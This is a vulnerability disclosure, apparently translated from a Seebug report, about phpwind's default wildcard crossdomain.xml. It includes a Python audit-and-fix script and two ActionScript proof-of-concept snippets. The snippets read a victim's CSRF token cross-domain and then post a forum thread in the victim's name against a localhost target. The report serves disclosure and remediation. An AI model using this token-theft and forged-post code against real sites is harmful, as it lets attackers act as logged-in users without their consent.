### Brief description:
A phpwind misconfiguration can allow CSRF posting
### Details:
The default crossdomain.xml:
```
<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<!-- Flash cross-domain policy; domain is recommended to be set to *.your-site-domain -->
</cross-domain-policy>
```
Although the comment gives a recommendation, which ordinary site admin would ever bother to change this? It would be better if you simply rewrote crossdomain.xml from the host at install time.
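As an added example (not phpwind's own code), here is the install-time rewrite suggested above: a small Python audit that flags the wildcard policy and generates a policy scoped to the installing site's host. The function names, the `site_url` parameter and the sample policy are assumptions.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed sample: the default policy quoted in the report, with the wildcard.
DEFAULT_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*"/>
</cross-domain-policy>
"""


def is_permissive(policy_xml: str) -> bool:
    """True if any allow-access-from entry grants every origin (domain="*").

    With such an entry, a Flash movie served from any site may read the
    logged-in user's responses, which is what makes the token readable.
    """
    root = ET.fromstring(policy_xml)
    return any(node.get("domain") == "*" for node in root.iter("allow-access-from"))


def policy_for_host(site_url: str) -> str:
    """Build the policy the report recommends at install time: access is
    limited to the installing site's own host and its subdomains."""
    host = urlsplit(site_url).hostname
    # Only a plain hostname may be interpolated into the XML attribute.
    if not host or not re.fullmatch(r"[A-Za-z0-9.-]+", host):
        raise ValueError("site_url must contain a valid hostname")
    return (
        '<?xml version="1.0"?>\n'
        "<cross-domain-policy>\n"
        f'  <allow-access-from domain="{host}"/>\n'
        f'  <allow-access-from domain="*.{host}"/>\n'
        "</cross-domain-policy>\n"
    )


if __name__ == "__main__":
    print("default policy permissive:", is_permissive(DEFAULT_POLICY))  # True
    fixed = policy_for_host("http://localhost:8080/index.php")
    print("generated policy permissive:", is_permissive(fixed))  # False
    print(fixed)
```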
First, obtain the CSRF token.
![Q.png](https://images.seebug.org/upload/201309/281417272339bb55dbba12ebfe356dc5c41e1449.png)
```
function gethash() {
    // Pull the csrf_token value out of the HTML of the post form.
    function getformhash(txt) {
        txt = txt.split('csrf_token" value="')[1].split('"')[0];
        return txt;
    }
    var result_lv:LoadVars = new LoadVars();
    result_lv.onData = function(txt) {
        if (txt) {
            txt = getformhash(txt);
        } else {
            txt = "Error connecting to server.";
        }
        trace(txt);
    };
    var send_lv:LoadVars = new LoadVars();
    // Cross-domain GET of the post form: the browser attaches the session
    // cookie, and the wildcard crossdomain.xml lets Flash read the response.
    var method:String = "GET";
    var url:String = "http://localhost:8080/index.php?c=post&fid=2";
    send_lv.sendAndLoad(url, result_lv, method);
}
gethash();
```
Then post via CSRF. pw does not even check the Referer here, so the request can be submitted directly from an external domain.
![Q57.png](https://images.seebug.org/upload/201309/2814210375a9d3ec8d9b214e5d677a3827b2caed.png)
```
function dopost() {
    var result_lv:LoadVars = new LoadVars();
    result_lv.onData = function(txt) {
        trace(txt);
    };
    var send_lv:LoadVars = new LoadVars();
    var method:String = "POST";
    var url:String = "http://localhost:8080/index.php?c=post&a=doadd&_json=1&fid=2";
    // The token read by gethash() is substituted for the placeholder.
    send_lv['csrf_token'] = '{{ csrf_token }}';
    send_lv['atc_title'] = '1380343694';
    send_lv['atc_content'] = '12112123123sdf1';
    send_lv['pid'] = '';
    send_lv['tid'] = '';
    send_lv['special'] = 'default';
    send_lv.sendAndLoad(url, result_lv, method);
}
dopost();
```
### Proof of vulnerability: